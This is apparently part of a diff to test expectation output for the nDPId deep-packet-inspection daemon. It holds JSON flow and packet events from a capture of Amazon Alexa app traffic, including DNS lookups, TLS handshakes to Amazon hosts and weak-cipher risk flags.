-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1490976160361,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1490976164994,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976164994,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmBAAEARM1WsECrYrBAqAfpJADUAKhd4KNkBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1490976165058,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976165058,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl5+FAAEARpaysECoBrBAq2AA1+kkAUQAZKNmBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAsACwhwaXRhbmd1acASwC4AAQABAAAABgAENF7ohg=="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 